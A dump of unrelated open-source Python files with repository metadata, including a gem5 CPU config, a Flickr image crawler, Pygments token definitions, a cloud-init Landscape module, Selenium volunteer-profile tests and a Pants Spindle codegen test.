# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Steve Reinhardt
import m5
from m5.objects import *
m5.util.addToPath('../configs/common')
class MyCache(BaseCache):
assoc = 2
block_size = 64
hit_latency = '1ns'
response_latency = '1ns'
mshrs = 10
tgts_per_mshr = 5
class MyL1Cache(MyCache):
is_top_level = True
tgts_per_mshr = 20
cpu = DerivO3CPU(cpu_id=0)
cpu.addTwoLevelCacheHierarchy(MyL1Cache(size = '128kB'),
MyL1Cache(size = '256kB'),
MyCache(size = '2MB'))
cpu.clock = '2GHz'
system = System(cpu = cpu,
physmem = SimpleMemory(),
membus = CoherentBus())
system.system_port = system.membus.slave
system.physmem.port = system.membus.master
# create the interrupt controller
cpu.createInterruptController()
cpu.connectAllPorts(system.membus)
root = Root(full_system = False, system = system)
|
lastweek/gem5
|
tests/configs/o3-timing.py
|
Python
|
bsd-3-clause
| 2,441
|
class FixedPointTheorem:
def cycleRange(self, R):
x = 0.25
high = -1
low = 999
for i in range(0, 201001):
x = R * x * (1-x)
if(i > 200000):
if(x > high):
high = x
if(x < low):
low = x
return high - low
|
mikefeneley/topcoder
|
src/SRM-152/fixed_point_theorem.py
|
Python
|
mit
| 351
|
#!/usr/bin/python
# Image querying script written by Tamara Berg,
# and extended heavily James Hays
# Modified by Juan C. Caicedo on Jan. 2013
# Further modified by Cecilia Mauceri Feb 2015
import sys, string, math, time, socket
import random, os, re
import threading
from multiprocessing import Queue, JoinableQueue
from queue import Empty
import subprocess
import crawler.config
from crawler.flickrapi2 import FlickrAPI, FlickrExpatError
from datetime import datetime
from crawler.dbdirs import DBDirectories
from crawler.download_thread_toSQL import DownloadImageThread, simpleDateFormat
import xml.parsers.expat
from requests.exceptions import SSLError
class MultiThreadedFlickrCrawler:
###########################################################################
# System parameters and initializations
###########################################################################
def __init__(self, cfg, category, max_num_images, communication_q, rate_limit):
self.cfg = cfg
self.category = category
argv = self.cfg.vars
self.communication_q = communication_q
self.do_exit = False
self.rate_limit = rate_limit
self.rate_q = Queue()
# flickr auth information: change these to your flickr api keys and secret
self.flickrAPIkeys = argv["flickrAPIkeys"].split(', ') # API key
self.flickrAPIsecrets = argv["flickrAPIsecrets"].split(', ') # shared "secret"
self.queryFileName = argv["queryFileName"] #'query_terms.txt'
self.homeDir = argv["homeDir"]
self.imagesPerDir = int(argv["imagesPerDir"])
self.flickrerrors = 0
# Crawler parameters
self.resultsPerPage = int(argv["resultsPerPage"])
self.downloadsPerQuery = int(argv["downloadsPerQuery"])
self.numberOfThreads = int(argv["numberOfThreads"])
self.startTime = int(argv["crawlerBeginTime"]) #1072915200 # 01/01/2004
self.finalTime = int(time.time())
self.singleDay = 86400 # 24hr*60min*60sec = 1day
self.max_num_images = max_num_images
self.database = argv["databaseName"]
# Structures Initialization
self.dbdir = DBDirectories(self.homeDir, argv["sysdir"], category)
self.indexOfUniqueImages = self.dbdir.inf + 'imageIndex.txt'
self.indexOfUniqueUsers = self.dbdir.inf + 'usersIndex.txt'
self.recentUsers = dict()
self.queryTerms = []
# Multithreaded downloading of images
self.queue = JoinableQueue()
self.out_queue = JoinableQueue()
self.threadsList = []
for i in range(self.numberOfThreads):
t = DownloadImageThread(self.queue, self.out_queue, self.dbdir.img, self.dbdir.txt, self.category,
self.database)
t.setDaemon(True)
t.start()
self.threadsList.append(t)
print(("{} initialized".format(self.category)))
###########################################################################
# Method to load query terms
###########################################################################
def loadQueries(self):
# Each term is a category
self.queryTerms = [self.category]
print(('positive queries:', self.queryTerms))
list(map(lambda t: t.setValidTags(self.queryTerms), self.threadsList))
return len(self.queryTerms)
###########################################################################
# Method to load index of image names
###########################################################################
def loadImageNamesIndex(self):
print('Loading index of images')
if os.path.exists(self.indexOfUniqueImages):
self.allImageNames = dict(
[(img.replace('\n', ''), True) for img in open(self.indexOfUniqueImages).readlines()])
print(('Index with', len(self.allImageNames), 'names is ready to use'))
else:
self.allImageNames = dict()
print(('No previous index found at {}'.format(self.indexOfUniqueImages)))
print('Loading index of users')
if os.path.exists(self.indexOfUniqueUsers):
self.recentUsers = dict([(usr.replace('\n', ''), 1) for usr in open(self.indexOfUniqueUsers).readlines()])
print(('Index with', len(self.recentUsers), 'users is ready to use'))
else:
self.recentUsers = dict()
print(('No previous user index found at {}'.format(self.indexOfUniqueUsers)))
###########################################################################
# Find out if an image is a duplicate or of a user already visited
###########################################################################
def isDuplicateImage(self, flickrResult):
b = flickrResult
owner_date = b['owner'] + '_' + simpleDateFormat(b['datetaken'])
imgName = b['server'] + '_' + b['id'] + '_' + b['secret'] + '_' + owner_date + '.jpg'
alreadyIndexed = False
userPhotos = 0
if imgName in self.allImageNames:
alreadyIndexed = self.allImageNames[imgName]
else:
self.allImageNames[imgName] = False
if owner_date in self.recentUsers:
userPhotos = self.recentUsers[owner_date]
else:
self.recentUsers[owner_date] = 0
if (not alreadyIndexed) and userPhotos < 1:
self.recentUsers[owner_date] += 1
self.allImageNames[imgName] = True
return False
else:
return True
###########################################################################
#Find out if medium format of photo exists for download
###########################################################################
def get_url(self, flickrResult, fapi, size):
url = "https://farm{}.staticflickr.com/{}/{}_{}.jpg".format(flickrResult['farm'], flickrResult['server'], flickrResult['id'], flickrResult['secret'])
return True, url
#TODO find way to speed up actual url retrieval
# image_id = flickrResult['id']
# success = False
# try:
# rsp = fapi.photos_getSizes(api_key=self.flickrAPIKey, photo_id=image_id)
# fapi.testFailure(rsp)
# except:
# print sys.exc_info()[0]
# print ('Exception encountered while querying for urls\n')
# else:
# if getattr(rsp, 'sizes', None):
# if int(rsp.sizes[0]['candownload']) == 1:
# if getattr(rsp.sizes[0], 'size', None):
# for image_size in rsp.sizes[0].size:
# if image_size['label'] == size:
# return True, image_size['source']
#
# return False, ""
###########################################################################
# Update index of unique image names
###########################################################################
def updateImageNamesIndex(self, newImages):
with open(self.indexOfUniqueImages, 'a') as indexFile:
for img in newImages:
indexFile.write(img + '\n')
self.allImageNames = []
###########################################################################
# Main Method. This runs the crawler in an infinite loop
###########################################################################
def start(self):
socket.setdefaulttimeout(30) #30 second time out on sockets before they throw
self.cfg.log(self.homeDir, "CRAWLER STARTED")
while not self.do_exit:
try:
command = self.communication_q.get(False)
except Empty as e:
#Randomly choose flickrAPIkeys and flickrAPIsecrets
currentKey = int(math.floor(random.random()*len(self.flickrAPIkeys)))
# make a new FlickrAPI instance
fapi = FlickrAPI(self.flickrAPIkeys[currentKey], self.flickrAPIsecrets[currentKey])
num_queries = self.loadQueries()
if num_queries == 0:
break
newImages = []
# Set time variables
self.finalTime = int(time.time())
currentTimeWindow = self.finalTime - self.startTime
mintime = self.startTime + random.randint(0, currentTimeWindow)
maxtime = mintime + 3 * self.singleDay
print(('Since:', datetime.fromtimestamp(mintime)))
print(('Until:', datetime.fromtimestamp(maxtime)))
print(('Previous Users:', len(self.recentUsers)))
self.loadImageNamesIndex()
if len(self.allImageNames) > self.max_num_images:
print("Max Images reached")
break
# Search Images using the query terms
for current_tag in range(0, num_queries):
dirNumName = self.dbdir.uploadCurrentDirAndGetNext(self.imagesPerDir, self.queryTerms)
print(("Current Directory Number: ", dirNumName))
#form the query string.
query_string = self.queryTerms[current_tag]
print(('\n\nquery_string is ' + query_string))
#only visit 8 pages max, to try and avoid the dreaded duplicate bug.
#8 pages * 250 images = 2000 images, should be duplicate safe. Most interesting pictures will be taken.
num_visit_pages = 16
pagenum = 1
while ( pagenum <= num_visit_pages ):
if (self.rate_q.qsize()>self.rate_limit):
#Age out time stamps older than one hour
found_all = False
while(not found_all):
next_stamp = self.rate_q.get()
if time.time() - next_stamp < 3600:
found_all = True
self.rate_q.put(next_stamp)
#Wait to age out time stamps if exceeded rate limit
if (self.rate_q.qsize()>self.rate_limit):
next_stamp = self.rate_q.get()
remaining_time = 3600 - (time.time() - next_stamp)
time.sleep(remaining_time)
self.rate_q.put(time.time()+60)
try:
rsp = fapi.photos_search(api_key=self.flickrAPIkeys[currentKey], ispublic="1", media="photos",
per_page=str(self.resultsPerPage), page=str(pagenum),
sort="interestingness-desc", text=query_string,
extras="tags, original_format, license, geo, date_taken, date_upload, o_dims, views, description",
min_upload_date=str(mintime),
max_upload_date=str(maxtime))
fapi.testFailure(rsp)
except KeyboardInterrupt:
print('Keyboard exception while querying for images, exiting\n')
raise
except (IOError, SSLError) as e:
print(('Error on Flickr photo request:{}\n'.format(e.strerror)))
except FlickrExpatError as e:
print(('Exception encountered while querying for images: {}\n'.format(e.message)))
print(('{}: {} to {} page {}\n'.format(query_string, mintime, maxtime, pagenum)))
print((e.xmlstr))
#I've identified two possible causes of this error: (1)Bad Gateway and (2)bad unicode characters in xml
time.sleep(5) #Waiting is best cure for bad gateway
pagenum = pagenum + 1 #Skipping to next page is best cure for bad character
#Just in case it has some connection to the rate limit, change the key
#Randomly choose flickrAPIkeys and flickrAPIsecrets
currentKey = int(math.floor(random.random()*len(self.flickrAPIkeys)))
# make a new FlickrAPI instance
fapi = FlickrAPI(self.flickrAPIkeys[currentKey], self.flickrAPIsecrets[currentKey])
self.flickrerrors += 1
if self.flickrerrors > 5:
print(("Too many Flickr Expat Errors in {}: Exiting".format(self.category)))
exit(1)
except Exception as e:
print((sys.exc_info()[0]))
print('Exception encountered while querying for images\n')
else:
# Process results
if getattr(rsp, 'photos', None):
if getattr(rsp.photos[0], 'photo', None):
random.shuffle(rsp.photos[0].photo)
for k in range(0, min(self.downloadsPerQuery, len(rsp.photos[0].photo))):
b = rsp.photos[0].photo[k]
if not self.isDuplicateImage(b):
isDownloadable, url = self.get_url(b, fapi, "Medium 640")
if isDownloadable:
b["url"] = url
self.queue.put((b, dirNumName))
print('Waiting threads')
self.queue.join()
while not self.out_queue.empty():
newImages.append(self.out_queue.get())
print((len(newImages), ' downloaded images'))
pagenum = pagenum + 1 #this is in the else exception block. It won't increment for a failure.
num_visit_pages = min(4, int(rsp.photos[0]['pages']))
# End While of Pages
# BEGIN: PROCESS DOWNLOADED IMAGES
self.updateImageNamesIndex(newImages)
else:
if command == "exit":
self.do_exit = True
print(("Wait for safe exit {}".format(self.category)))
print('End')
self.cfg.log(self.homeDir, "CRAWLER STOPPED")
|
crmauceri/VisualCommonSense
|
code/crawler/flickr_threads_toSQL.py
|
Python
|
mit
| 15,011
|
from tile import *
from board import *
class Player(object):
def __init__(self, name):
self.name = name
self.hand = TilePile()
print("New player " + self.name)
def add_to_hand(self, tile):
"""
Adds tile to hand.
"""
self.hand.add_tile(tile)
def remove_from_hand(self, tile):
"""
Removes tile from hand.
"""
self.hand.remove_tile(tile)
def other_player(self):
"""
Get pointer to the other player.
"""
for player in players:
if self.name != player.name:
return player
def play_randomly(self):
"""
Make a random move.
If hand is empty, move a piece.
If not, place a piece.
"""
if self.hand.is_empty():
self.move_random_piece()
else:
self.place_random_piece()
def place_random_piece(self):
"""
Places a random piece from the hand into the board.
"""
if not self.hand.is_empty():
played = False
while not played:
my_piece = self.hand.give_random_tile()
played = my_piece.place_randomly()
def move_random_piece(self):
"""
Move one of the Player pieces randomly.
"""
my_pieces = my_board.player_pieces(self)
if my_pieces != []:
played = False
while not played:
my_piece = random.choice(my_pieces)
played = my_piece.move_randomly()
def wins(self):
"""
Player wins!
"""
#TODO: Player.wins() should finish the game
print("WIN!")
sky_player = Player("sky")
land_player = Player("land")
players = [sky_player, land_player]
|
abenseny/ds
|
player.py
|
Python
|
mit
| 1,808
|
import logging
from pytos.common.base_types import XML_Object_Base, XML_List
from pytos.common.logging.definitions import XML_LOGGER_NAME
from pytos.common.definitions import xml_tags
from pytos.common.functions.xml import get_xml_text_value, get_xml_int_value, get_xml_node
from pytos.securetrack.xml_objects.rest.rules import Shadowed_Rule
logger = logging.getLogger(XML_LOGGER_NAME)
class Generic_Cleanup_List(XML_List):
def __init__(self, count, total, score, cleanups):
self.count = count
self.total = total
self.score = score
super().__init__(xml_tags.Elements.CLEANUPS, cleanups)
@classmethod
def from_xml_node(cls, xml_node):
"""
Initialize the object from a XML node.
:param xml_node: The XML node from which all necessary parameters will be parsed.
:type xml_node: xml.etree.Element
"""
count = get_xml_int_value(xml_node, xml_tags.Elements.COUNT)
total = get_xml_int_value(xml_node, xml_tags.Elements.TOTAL)
score = get_xml_int_value(xml_node, xml_tags.Elements.SCORE)
cleanups = []
for user_node in xml_node.iter(tag=xml_tags.Elements.CLEANUP):
cleanups.append(Generic_Cleanup.from_xml_node(user_node))
return cls(count, total, score, cleanups)
class Generic_Cleanup(XML_Object_Base):
def __init__(self, num_id, code, name, instances_total):
self.id = num_id
self.code = code
self.name = name
self.instances_total = instances_total
super().__init__(xml_tags.Elements.CLEANUP)
@classmethod
def from_xml_node(cls, xml_node):
"""
Initialize the object from a XML node.
:param xml_node: The XML node from which all necessary parameters will be parsed.
:type xml_node: xml.etree.Element
"""
num_id = get_xml_int_value(xml_node, xml_tags.Elements.ID)
code = get_xml_text_value(xml_node, xml_tags.Elements.CODE)
name = get_xml_text_value(xml_node, xml_tags.Elements.NAME)
instances_total = get_xml_int_value(xml_node, xml_tags.Elements.INSTANCES_TOTAL)
return cls(num_id, code, name, instances_total)
class Cleanup_Set(XML_Object_Base):
def __init__(self, shadowed_rules_cleanup=None):
self.shadowed_rules_cleanup = shadowed_rules_cleanup
super().__init__(xml_tags.Elements.CLEANUP_SET)
@classmethod
def from_xml_node(cls, xml_node):
"""
Initialize the object from a XML node.
:param xml_node: The XML node from which all necessary parameters will be parsed.
:type xml_node: xml.etree.Element
"""
shadowed_rules_cleanup = Shadowed_Rules_Cleanup.from_xml_node(
get_xml_node(xml_node, xml_tags.Elements.SHADOWED_RULES_CLEANUP))
return cls(shadowed_rules_cleanup)
class Shadowed_Rules_Cleanup(XML_Object_Base):
def __init__(self, shadowed_rules=None):
self.shadowed_rules = XML_List(xml_tags.Elements.SHADOWED_RULES, shadowed_rules)
super().__init__(xml_tags.Elements.SHADOWED_RULES_CLEANUP)
@classmethod
def from_xml_node(cls, xml_node):
"""
Initialize the object from a XML node.
:param xml_node: The XML node from which all necessary parameters will be parsed.
:type xml_node: xml.etree.Element
"""
shadowed_rules = XML_List(xml_tags.Elements.SHADOWED_RULES)
for shadowed_rule_node in xml_node.iter(tag=xml_tags.Elements.SHADOWED_RULE):
shadowed_rules.append(Shadowed_Rule.from_xml_node(shadowed_rule_node))
return cls(shadowed_rules)
|
Tufin/pytos
|
pytos/securetrack/xml_objects/rest/cleanups.py
|
Python
|
apache-2.0
| 3,635
|
# -*- coding: utf-8 -*-
"""
pygments.token
~~~~~~~~~~~~~~
Basic token types and the standard tokens.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
class _TokenType(tuple):
parent = None
def split(self):
buf = []
node = self
while node is not None:
buf.append(node)
node = node.parent
buf.reverse()
return buf
def __init__(self, *args):
# no need to call super.__init__
self.subtypes = set()
def __contains__(self, val):
return self is val or (
type(val) is self.__class__ and
val[:len(self)] == self
)
def __getattr__(self, val):
if not val or not val[0].isupper():
return tuple.__getattribute__(self, val)
new = _TokenType(self + (val,))
setattr(self, val, new)
self.subtypes.add(new)
new.parent = self
return new
def __repr__(self):
return 'Token' + (self and '.' or '') + '.'.join(self)
Token = _TokenType()
# Special token types
Text = Token.Text
Whitespace = Text.Whitespace
Escape = Token.Escape
Error = Token.Error
# Text that doesn't belong to this lexer (e.g. HTML in PHP)
Other = Token.Other
# Common token types for source code
Keyword = Token.Keyword
Name = Token.Name
Literal = Token.Literal
String = Literal.String
Number = Literal.Number
Punctuation = Token.Punctuation
Operator = Token.Operator
Comment = Token.Comment
# Generic types for non-source code
Generic = Token.Generic
# String and some others are not direct childs of Token.
# alias them:
Token.Token = Token
Token.String = String
Token.Number = Number
def is_token_subtype(ttype, other):
"""
Return True if ``ttype`` is a subtype of ``other``.
exists for backwards compatibility. use ``ttype in other`` now.
"""
return ttype in other
def string_to_tokentype(s):
"""
Convert a string into a token type::
>>> string_to_token('String.Double')
Token.Literal.String.Double
>>> string_to_token('Token.Literal.Number')
Token.Literal.Number
>>> string_to_token('')
Token
Tokens that are already tokens are returned unchanged:
>>> string_to_token(String)
Token.Literal.String
"""
if isinstance(s, _TokenType):
return s
if not s:
return Token
node = Token
for item in s.split('.'):
node = getattr(node, item)
return node
# Map standard token types to short names, used in CSS class naming.
# If you add a new item, please be sure to run this file to perform
# a consistency check for duplicate values.
STANDARD_TYPES = {
Token: '',
Text: '',
Whitespace: 'w',
Escape: 'esc',
Error: 'err',
Other: 'x',
Keyword: 'k',
Keyword.Constant: 'kc',
Keyword.Declaration: 'kd',
Keyword.Namespace: 'kn',
Keyword.Pseudo: 'kp',
Keyword.Reserved: 'kr',
Keyword.Type: 'kt',
Name: 'n',
Name.Attribute: 'na',
Name.Builtin: 'nb',
Name.Builtin.Pseudo: 'bp',
Name.Class: 'nc',
Name.Constant: 'no',
Name.Decorator: 'nd',
Name.Entity: 'ni',
Name.Exception: 'ne',
Name.Function: 'nf',
Name.Property: 'py',
Name.Label: 'nl',
Name.Namespace: 'nn',
Name.Other: 'nx',
Name.Tag: 'nt',
Name.Variable: 'nv',
Name.Variable.Class: 'vc',
Name.Variable.Global: 'vg',
Name.Variable.Instance: 'vi',
Literal: 'l',
Literal.Date: 'ld',
String: 's',
String.Backtick: 'sb',
String.Char: 'sc',
String.Doc: 'sd',
String.Double: 's2',
String.Escape: 'se',
String.Heredoc: 'sh',
String.Interpol: 'si',
String.Other: 'sx',
String.Regex: 'sr',
String.Single: 's1',
String.Symbol: 'ss',
Number: 'm',
Number.Float: 'mf',
Number.Hex: 'mh',
Number.Integer: 'mi',
Number.Integer.Long: 'il',
Number.Oct: 'mo',
Operator: 'o',
Operator.Word: 'ow',
Punctuation: 'p',
Comment: 'c',
Comment.Multiline: 'cm',
Comment.Preproc: 'cp',
Comment.Single: 'c1',
Comment.Special: 'cs',
Generic: 'g',
Generic.Deleted: 'gd',
Generic.Emph: 'ge',
Generic.Error: 'gr',
Generic.Heading: 'gh',
Generic.Inserted: 'gi',
Generic.Output: 'go',
Generic.Prompt: 'gp',
Generic.Strong: 'gs',
Generic.Subheading: 'gu',
Generic.Traceback: 'gt',
}
|
victoredwardocallaghan/pygments-main
|
pygments/token.py
|
Python
|
bsd-2-clause
| 5,731
|
from zope.interface import implementer
from zope.interface import alsoProvides
###############################################################################
# IO related
###############################################################################
from plumber import plumber
from node.behaviors import (
Adopt,
NodeChildValidate,
Nodespaces,
Attributes,
DefaultInit,
Nodify,
Reference,
Order,
OdictStorage,
)
class Node(object):
__metaclass__ = plumber
__plumbing__ = (
Adopt,
NodeChildValidate,
Nodespaces,
Attributes,
DefaultInit,
Nodify,
Reference,
Order,
OdictStorage,
)
from agx.core.interfaces import ISource
@implementer(ISource)
class SourceMock(Node):
pass
from agx.core.interfaces import ITarget
@implementer(ITarget)
class TargetMock(Node):
def __call__(self):
print '``__call__()`` of %s' % '.'.join(self.path)
for child in self:
child()
###############################################################################
# Transform related
###############################################################################
from node.interfaces import IRoot
from agx.core.interfaces import ITransform
@implementer(ITransform)
class TransformMock(object):
def __init__(self, name):
self.name = name
self._source = SourceMock('root')
self._target = TargetMock('root')
def source(self, path):
return self._source
def target(self, path):
return self._target
###############################################################################
# Generator related
###############################################################################
from agx.core import TargetHandler
class TargetHandlerMock(TargetHandler):
def __call__(self, source):
self.setanchor(source.path)
|
bluedynamics/agx.core
|
src/agx/core/testing/mock.py
|
Python
|
bsd-3-clause
| 1,940
|
# vi: ts=4 expandtab
#
# Copyright (C) 2011 Canonical Ltd.
# Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# Copyright (C) 2014 Amazon.com, Inc. or its affiliates.
#
# Author: Scott Moser <scott.moser@canonical.com>
# Author: Juerg Haefliger <juerg.haefliger@hp.com>
# Author: Andrew Jorgensen <ajorgens@amazon.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from StringIO import StringIO
from configobj import ConfigObj
from cloudinit import type_utils
from cloudinit import util
from cloudinit.settings import PER_INSTANCE
frequency = PER_INSTANCE
LSC_CLIENT_CFG_FILE = "/etc/landscape/client.conf"
LS_DEFAULT_FILE = "/etc/default/landscape-client"
distros = ['ubuntu']
# defaults taken from stock client.conf in landscape-client 11.07.1.1-0ubuntu2
LSC_BUILTIN_CFG = {
'client': {
'log_level': "info",
'url': "https://landscape.canonical.com/message-system",
'ping_url': "http://landscape.canonical.com/ping",
'data_path': "/var/lib/landscape/client",
}
}
def handle(_name, cfg, cloud, log, _args):
"""
Basically turn a top level 'landscape' entry with a 'client' dict
and render it to ConfigObj format under '[client]' section in
/etc/landscape/client.conf
"""
ls_cloudcfg = cfg.get("landscape", {})
if not isinstance(ls_cloudcfg, (dict)):
raise RuntimeError(("'landscape' key existed in config,"
" but not a dictionary type,"
" is a %s instead"),
type_utils.obj_name(ls_cloudcfg))
if not ls_cloudcfg:
return
cloud.distro.install_packages(('landscape-client',))
merge_data = [
LSC_BUILTIN_CFG,
LSC_CLIENT_CFG_FILE,
ls_cloudcfg,
]
merged = merge_together(merge_data)
contents = StringIO()
merged.write(contents)
util.ensure_dir(os.path.dirname(LSC_CLIENT_CFG_FILE))
util.write_file(LSC_CLIENT_CFG_FILE, contents.getvalue())
log.debug("Wrote landscape config file to %s", LSC_CLIENT_CFG_FILE)
util.write_file(LS_DEFAULT_FILE, "RUN=1\n")
cloud.distro.service_control("landscape-client", "restart")
def merge_together(objs):
"""
merge together ConfigObj objects or things that ConfigObj() will take in
later entries override earlier
"""
cfg = ConfigObj({})
for obj in objs:
if not obj:
continue
if isinstance(obj, ConfigObj):
cfg.merge(obj)
else:
cfg.merge(ConfigObj(obj))
return cfg
|
henrysher/aws-cloudinit
|
cloudinit/config/cc_landscape.py
|
Python
|
gpl-3.0
| 3,109
|
from base import Setting, SettingSet
from django.utils.translation import ugettext as _
URLS_SET = SettingSet('urls', _('URL settings'), _("Some settings to tweak behaviour of site urls (experimental)."))
ALLOW_UNICODE_IN_SLUGS = Setting('ALLOW_UNICODE_IN_SLUGS', False, URLS_SET, dict(
label = _("Allow unicode in slugs"),
help_text = _("Allow unicode/non-latin characters in urls."),
required=False))
FORCE_SINGLE_URL = Setting('FORCE_SINGLE_URL', True, URLS_SET, dict(
label = _("Force single url"),
help_text = _("Redirect the request in case there is a mismatch between the slug in the url and the actual slug"),
required=False))
|
CLLKazan/iCQA
|
qa-engine/forum/settings/urls.py
|
Python
|
gpl-3.0
| 639
|
from flask import Blueprint
api = Blueprint('api', __name__)
from . import post
|
keithemiller/PVTA_Ride_Estimator
|
app/api/__init__.py
|
Python
|
mit
| 82
|
"""
Created on 6/05/2013
@author: thom
"""
from plot import Plot
from evaluator import Evaluator
import matplotlib.colors as colors
import logging
class PlotNewMoleculeTypes(Plot):
def draw_figure(self, f1, results_filename, **kwargs):
iterations = [0]
molecular_types_difference = [0]
cumulative_types = set()
count = 0
previous_count = 0
iteration = 0
for block in Evaluator.incr_load_results(results_filename):
for reaction in block['reactions']:
for product in reaction['products']:
if product['smiles'] not in cumulative_types:
count += 1
cumulative_types.add(product['smiles'])
iteration += 1
if iteration % 50 == 0:
difference = count-previous_count
previous_count = count
molecular_types_difference.append(difference)
iterations.append(reaction['t'])
# Append final values
if iteration % 50 != 0:
molecular_types_difference.append(count)
iterations.append(iteration)
initial_parameters = Evaluator.get_initial_parameters(results_filename)
ke = initial_parameters['initial_kinetic_energy'] / initial_parameters['initial_population'].get_population_size() * 1.0
logging.info("Initial average KE={}".format(ke))
ax = f1.add_subplot(1, 1, 1) # one row, one column, first plot
ax.set_title('New Molecular Types by time (initial average KE={:.2f})'.format(ke))
ax.set_xlabel('Time')
ax.set_ylabel('Number of New Types')
ax.set_xlim(left=0, right=iterations[-1])
ax.plot(iterations, molecular_types_difference, color=colors.cnames['slategray'], marker=',', linestyle='None')
ax.grid()
|
th0mmeke/toyworld
|
evaluators/plot_new_molecule_types.py
|
Python
|
gpl-3.0
| 1,888
|
# standard library
import re
# third party
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
# Django
from django.contrib.staticfiles.testing import LiveServerTestCase
# local Django
from pom.pages.authenticationPage import AuthenticationPage
from pom.pages.volunteerProfilePage import VolunteerProfilePage
from volunteer.models import Volunteer
from shift.utils import create_volunteer_with_details
class VolunteerProfile(LiveServerTestCase):
'''
'''
@classmethod
def setUpClass(cls):
cls.driver = webdriver.Firefox()
cls.driver.implicitly_wait(5)
cls.driver.maximize_window()
cls.profile_page = VolunteerProfilePage(cls.driver)
cls.authentication_page = AuthenticationPage(cls.driver)
super(VolunteerProfile, cls).setUpClass()
def setUp(self):
vol = ['Sherlock',"Sherlock","Holmes","221-B Baker Street","London","London-State","UK","9999999999","idonthave@gmail.com"]
self.v1 = create_volunteer_with_details(vol)
self.v1.unlisted_organization = 'Detective'
self.v1.save()
self.login_correctly()
self.profile_page.navigate_to_profile()
def tearDown(self):
pass
@classmethod
def tearDownClass(cls):
cls.driver.quit()
super(VolunteerProfile, cls).tearDownClass()
def login_correctly(self):
self.authentication_page.server_url = self.live_server_url
self.authentication_page.login({ 'username' : "Sherlock", 'password' : "volunteer"})
def test_details_tab(self):
profile_page = self.profile_page
page_source = self.driver.page_source
found_email = re.search(self.v1.email, page_source)
self.assertNotEqual(found_email, None)
found_city = re.search(self.v1.city, page_source)
self.assertNotEqual(found_city, None)
found_state = re.search(self.v1.state, page_source)
self.assertNotEqual(found_state, None)
found_country = re.search(self.v1.country, page_source)
self.assertNotEqual(found_country, None)
found_org = re.search(self.v1.unlisted_organization, page_source)
self.assertNotEqual(found_org, None)
def test_edit_profile(self):
profile_page = self.profile_page
profile_page.edit_profile()
new_details = ['Harvey', 'Specter', 'hspecter@ps.com', 'Empire State Building', 'NYC', 'New York', 'USA', '9999999998', 'None', 'Lawyer']
profile_page.fill_values(new_details)
page_source = self.driver.page_source
found_email = re.search(self.v1.email, page_source)
self.assertEqual(found_email, None)
found_city = re.search(self.v1.city, page_source)
self.assertEqual(found_city, None)
found_state = re.search(self.v1.state, page_source)
self.assertEqual(found_state, None)
found_country = re.search(self.v1.country, page_source)
self.assertEqual(found_country, None)
found_org = re.search(self.v1.unlisted_organization, page_source)
self.assertEqual(found_org, None)
found_email = re.search(new_details[2], page_source)
self.assertNotEqual(found_email, None)
found_city = re.search(new_details[4], page_source)
self.assertNotEqual(found_city, None)
found_state = re.search(new_details[5], page_source)
self.assertNotEqual(found_state, None)
found_country = re.search(new_details[6], page_source)
self.assertNotEqual(found_country, None)
found_org = re.search(new_details[9], page_source)
self.assertNotEqual(found_org, None)
# database check to ensure that profile has been updated
self.assertEqual(len(Volunteer.objects.all()), 1)
self.assertNotEqual(len(Volunteer.objects.filter(
first_name = new_details[0],
last_name = new_details[1],
email=new_details[2],
address = new_details[3],
city = new_details[4],
state = new_details[5],
country = new_details[6],
phone_number = new_details[7])), 0)
def test_upload_resume(self):
pass
'''
#Tested locally
profile_page = self.profile_page
profile_page.edit_profile()
profile_page.upload_resume('/home/jlahori/Downloads/water.pdf')
profile_page.submit_form()
self.assertEqual(profile_page.download_resume_text(),'Download Resume')
'''
def test_invalid_resume_format(self):
pass
'''
#Tested locally
profile_page = self.profile_page
profile_page.edit_profile()
profile_page.upload_resume('/home/jlahori/Downloads/ca.crt')
profile_page.submit_form()
self.assertEqual(profile_page.get_invalid_format_error(),'Uploaded file is invalid.')
'''
|
tulikavijay/vms
|
vms/volunteer/tests/test_volunteerProfile.py
|
Python
|
gpl-2.0
| 4,912
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
from textwrap import dedent
from pants.backend.jvm.targets.jar_dependency import JarDependency
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.scala_library import ScalaLibrary
from pants.base.build_file_aliases import BuildFileAliases
from pants.goal.context import Context
from pants_test.jvm.jvm_tool_task_test_base import JvmToolTaskTestBase
from pants.contrib.spindle.targets.spindle_thrift_library import SpindleThriftLibrary
from pants.contrib.spindle.tasks.spindle_gen import SpindleGen
class SpindleGenTest(JvmToolTaskTestBase):
@classmethod
def task_type(cls):
return SpindleGen
@property
def alias_groups(self):
return BuildFileAliases.create(
targets={
'spindle_thrift_library': SpindleThriftLibrary,
'jar_library': JarLibrary,
},
objects={
'jar': JarDependency,
})
def test_smoke(self):
contents = dedent('''namespace java org.pantsbuild.example
struct Example {
1: optional i64 number
}
''')
self.create_file(relpath='test_smoke/a.thrift', contents=contents)
self.add_to_build_file('3rdparty', dedent('''
jar_library(
name = 'spindle-runtime',
jars = [
jar(org = 'com.foursquare', name = 'spindle-runtime_2.10', rev = '3.0.0-M7'),
],
)
'''
))
self.make_target(spec='test_smoke:a',
target_type=SpindleThriftLibrary,
sources=['a.thrift'])
target = self.target('test_smoke:a')
context = self.context(target_roots=[target])
task = self.execute(context)
